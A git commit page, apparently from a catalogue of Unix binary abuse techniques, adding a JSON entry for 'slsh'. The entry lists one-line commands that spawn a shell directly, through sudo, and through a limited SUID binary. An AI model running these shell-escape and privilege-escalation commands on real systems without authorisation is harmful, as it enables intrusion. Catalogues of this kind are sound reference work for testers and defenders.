add data source for slsh

master
Mr. Robot 4 years ago committed by GitHub
parent 5895ecfe9f
commit 209e9a8944
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

@ -0,0 +1,19 @@
{
"functions": {
"shell": [
{
"code": "slsh -e 'system(\"/bin/sh\")'"
}
],
"sudo": [
{
"code": "sudo slsh -e 'system(\"/bin/sh\")'"
}
],
"limited-suid": [
{
"code": "./slsh -e 'system(\"/bin/sh\")'"
}
]
}
}
Loading…
Cancel
Save